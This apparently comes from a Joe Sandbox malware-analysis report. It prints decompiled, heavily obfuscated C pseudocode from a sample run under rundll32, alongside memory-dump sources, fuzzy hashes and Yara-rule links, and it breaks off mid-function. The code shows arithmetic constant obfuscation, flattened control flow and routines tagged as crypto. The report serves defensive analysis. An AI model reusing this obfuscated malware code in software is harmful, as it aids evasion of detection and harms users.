				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002E20B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E002E0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E002DED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}












                                                                                                                                  0x002f0e41
                                                                                                                                  0x002f0e45
                                                                                                                                  0x002f0e46
                                                                                                                                  0x002f0e49
                                                                                                                                  0x002f0e4b
                                                                                                                                  0x002f0e4e
                                                                                                                                  0x002f0e52
                                                                                                                                  0x002f0e53
                                                                                                                                  0x002f0e58
                                                                                                                                  0x002f0e65
                                                                                                                                  0x002f0e68
                                                                                                                                  0x002f0e6c
                                                                                                                                  0x002f0e73
                                                                                                                                  0x002f0e7a
                                                                                                                                  0x002f0e81
                                                                                                                                  0x002f0e88
                                                                                                                                  0x002f0e8f
                                                                                                                                  0x002f0e93
                                                                                                                                  0x002f0e9a
                                                                                                                                  0x002f0ea1
                                                                                                                                  0x002f0ea8
                                                                                                                                  0x002f0eaf
                                                                                                                                  0x002f0eb6
                                                                                                                                  0x002f0ebd
                                                                                                                                  0x002f0ec4
                                                                                                                                  0x002f0ecb
                                                                                                                                  0x002f0ecf
                                                                                                                                  0x002f0ed6
                                                                                                                                  0x002f0edd
                                                                                                                                  0x002f0ee4
                                                                                                                                  0x002f0eeb
                                                                                                                                  0x002f0ef2
                                                                                                                                  0x002f0ef6
                                                                                                                                  0x002f0f0c
                                                                                                                                  0x002f0f1f
                                                                                                                                  0x002f0f24
                                                                                                                                  0x002f0f2a
                                                                                                                                  0x002f0f32

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: =.SG$]O+
                                                                                                                                  • API String ID: 0-348654084
                                                                                                                                  • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                  • Instruction ID: a2fd5e8f492ed5daabd5c8c105aeef7201885838c58b98d1d51630d9d213f67f
                                                                                                                                  • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                  • Instruction Fuzzy Hash: B021457180120DEFCF05DFE5DA4A8AEBBB1FF45304F208599E92562224C3B19B24DFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog3
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 431132790-0
                                                                                                                                  • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                  • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                                  • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                  • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E044F Relevance: 1.5, Strings: 1, Instructions: 287COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002E044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x2f3e00; // 0x0
								_t339 = _v56;
								_t311 = E002E0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E002D9462(E002EDCF7(_v24, 0x2d17f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E002DA8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x2f3e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E002D7FF2(_t373);
										 *0x2f3e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x2f3e00; // 0x0
										_t325 = E002D7FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x2f3e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E002E8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E002E8519(_v64, _v72,  *0x2f3e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E002D957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}


























































                                                                                                                                  0x002e044f
                                                                                                                                  0x002e0459
                                                                                                                                  0x002e0466
                                                                                                                                  0x002e0471
                                                                                                                                  0x002e0473
                                                                                                                                  0x002e047a
                                                                                                                                  0x002e0481
                                                                                                                                  0x002e0489
                                                                                                                                  0x002e0491
                                                                                                                                  0x002e0496
                                                                                                                                  0x002e049e
                                                                                                                                  0x002e04a6
                                                                                                                                  0x002e04ae
                                                                                                                                  0x002e04b3
                                                                                                                                  0x002e04b8
                                                                                                                                  0x002e04c0
                                                                                                                                  0x002e04c8
                                                                                                                                  0x002e04d0
                                                                                                                                  0x002e04d8
                                                                                                                                  0x002e04e0
                                                                                                                                  0x002e04e8
                                                                                                                                  0x002e04f0
                                                                                                                                  0x002e04f8
                                                                                                                                  0x002e0500
                                                                                                                                  0x002e0508
                                                                                                                                  0x002e0510
                                                                                                                                  0x002e0518
                                                                                                                                  0x002e0520
                                                                                                                                  0x002e0528
                                                                                                                                  0x002e052d
                                                                                                                                  0x002e053b
                                                                                                                                  0x002e0540
                                                                                                                                  0x002e0546
                                                                                                                                  0x002e054e
                                                                                                                                  0x002e0553
                                                                                                                                  0x002e055b
                                                                                                                                  0x002e0560
                                                                                                                                  0x002e0564
                                                                                                                                  0x002e056c
                                                                                                                                  0x002e0578
                                                                                                                                  0x002e057d
                                                                                                                                  0x002e0583
                                                                                                                                  0x002e058b
                                                                                                                                  0x002e0593
                                                                                                                                  0x002e059b
                                                                                                                                  0x002e05a3
                                                                                                                                  0x002e05ab
                                                                                                                                  0x002e05b3
                                                                                                                                  0x002e05bb
                                                                                                                                  0x002e05c0
                                                                                                                                  0x002e05c8
                                                                                                                                  0x002e05d0
                                                                                                                                  0x002e05db
                                                                                                                                  0x002e05e6
                                                                                                                                  0x002e05f1
                                                                                                                                  0x002e05f9
                                                                                                                                  0x002e0601
                                                                                                                                  0x002e0609
                                                                                                                                  0x002e0615
                                                                                                                                  0x002e061a
                                                                                                                                  0x002e0624
                                                                                                                                  0x002e0627
                                                                                                                                  0x002e0634
                                                                                                                                  0x002e0637
                                                                                                                                  0x002e063b
                                                                                                                                  0x002e0643
                                                                                                                                  0x002e064e
                                                                                                                                  0x002e0656
                                                                                                                                  0x002e0661
                                                                                                                                  0x002e0671
                                                                                                                                  0x002e0675
                                                                                                                                  0x002e0681
                                                                                                                                  0x002e0686
                                                                                                                                  0x002e068c
                                                                                                                                  0x002e0694
                                                                                                                                  0x002e069c
                                                                                                                                  0x002e06a4
                                                                                                                                  0x002e06ac
                                                                                                                                  0x002e06b9
                                                                                                                                  0x002e06bc
                                                                                                                                  0x002e06c0
                                                                                                                                  0x002e06c8
                                                                                                                                  0x002e06d0
                                                                                                                                  0x002e06d8
                                                                                                                                  0x002e06e8
                                                                                                                                  0x002e06f0
                                                                                                                                  0x002e06f3
                                                                                                                                  0x002e06f7
                                                                                                                                  0x002e06ff
                                                                                                                                  0x002e0707
                                                                                                                                  0x002e070f
                                                                                                                                  0x002e0714
                                                                                                                                  0x002e0719
                                                                                                                                  0x002e071e
                                                                                                                                  0x002e0726
                                                                                                                                  0x002e072e
                                                                                                                                  0x002e0736
                                                                                                                                  0x002e073a
                                                                                                                                  0x002e0742
                                                                                                                                  0x002e074a
                                                                                                                                  0x002e0752
                                                                                                                                  0x002e075a
                                                                                                                                  0x002e075f
                                                                                                                                  0x002e0767
                                                                                                                                  0x002e076f
                                                                                                                                  0x002e0777
                                                                                                                                  0x002e077f
                                                                                                                                  0x002e0787
                                                                                                                                  0x002e078f
                                                                                                                                  0x002e0797
                                                                                                                                  0x002e079f
                                                                                                                                  0x002e07a7
                                                                                                                                  0x002e07af
                                                                                                                                  0x002e07b7
                                                                                                                                  0x002e07bf
                                                                                                                                  0x002e07c7
                                                                                                                                  0x002e07cc
                                                                                                                                  0x002e07d1
                                                                                                                                  0x002e07d6
                                                                                                                                  0x002e07de
                                                                                                                                  0x002e07e6
                                                                                                                                  0x002e07ee
                                                                                                                                  0x002e07f6
                                                                                                                                  0x002e07fe
                                                                                                                                  0x002e0806
                                                                                                                                  0x002e080e
                                                                                                                                  0x002e0818
                                                                                                                                  0x002e0820
                                                                                                                                  0x002e0828
                                                                                                                                  0x002e0830
                                                                                                                                  0x002e0838
                                                                                                                                  0x002e0845
                                                                                                                                  0x002e0849
                                                                                                                                  0x002e0851
                                                                                                                                  0x002e0859
                                                                                                                                  0x002e0859
                                                                                                                                  0x002e085f
                                                                                                                                  0x002e085f
                                                                                                                                  0x002e0864
                                                                                                                                  0x002e0864
                                                                                                                                  0x002e0866
                                                                                                                                  0x002e0985
                                                                                                                                  0x002e099f
                                                                                                                                  0x002e09a3
                                                                                                                                  0x002e09a8
                                                                                                                                  0x002e09ab
                                                                                                                                  0x002e09af
                                                                                                                                  0x002e09be
                                                                                                                                  0x00000000
                                                                                                                                  0x002e09b1
                                                                                                                                  0x002e09b3
                                                                                                                                  0x002e09b8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e09b8
                                                                                                                                  0x002e086c
                                                                                                                                  0x002e0872
                                                                                                                                  0x002e091a
                                                                                                                                  0x002e0923
                                                                                                                                  0x002e0963
                                                                                                                                  0x002e0967
                                                                                                                                  0x002e0970
                                                                                                                                  0x002e0973
                                                                                                                                  0x002e0978
                                                                                                                                  0x002e09c0
                                                                                                                                  0x002e09c0
                                                                                                                                  0x002e09c6
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0878
                                                                                                                                  0x002e087e
                                                                                                                                  0x002e08c7
                                                                                                                                  0x002e08c8
                                                                                                                                  0x002e08cb
                                                                                                                                  0x002e08cc
                                                                                                                                  0x002e08d1
                                                                                                                                  0x002e08d6
                                                                                                                                  0x002e08e9
                                                                                                                                  0x002e08f2
                                                                                                                                  0x002e08f7
                                                                                                                                  0x002e08fd
                                                                                                                                  0x002e0907
                                                                                                                                  0x002e0909
                                                                                                                                  0x002e090c
                                                                                                                                  0x002e090f
                                                                                                                                  0x002e0912
                                                                                                                                  0x002e085f
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0880
                                                                                                                                  0x002e0882
                                                                                                                                  0x002e09e7
                                                                                                                                  0x002e09fa
                                                                                                                                  0x002e0888
                                                                                                                                  0x002e088e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0894
                                                                                                                                  0x002e08ae
                                                                                                                                  0x002e08b3
                                                                                                                                  0x002e088e
                                                                                                                                  0x002e0882
                                                                                                                                  0x002e087e
                                                                                                                                  0x002e0872
                                                                                                                                  0x002e0a04
                                                                                                                                  0x002e0a0d
                                                                                                                                  0x002e09cb
                                                                                                                                  0x002e09cb
                                                                                                                                  0x002e09cb
                                                                                                                                  0x00000000
                                                                                                                                  0x002e09d7
                                                                                                                                  0x002e085f

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 0-2314114710
                                                                                                                                  • Opcode ID: 4b7f66143ac83b1a9ae5c8fa8fc4de0d8530a0894183ea665bf4f976631ebc33
                                                                                                                                  • Instruction ID: bc967c91353cec62aafdef1b4a62e25509a8ce13b116f983ebe2c1023ffe0237
                                                                                                                                  • Opcode Fuzzy Hash: 4b7f66143ac83b1a9ae5c8fa8fc4de0d8530a0894183ea665bf4f976631ebc33
                                                                                                                                  • Instruction Fuzzy Hash: BCE14F715183809FD368CF26D58A90BBBF2FBC4B58F60891DF59A86260C7B1C959CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Iconic
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 110040809-0
                                                                                                                                  • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                  • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                                  • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                  • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E9EEC Relevance: 1.5, Strings: 1, Instructions: 226COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E002E9EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E002E8519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x2f3e10; // 0x0
							E002D8ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x2f3e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E002DA9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E002DF899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E002D4E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E002E894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
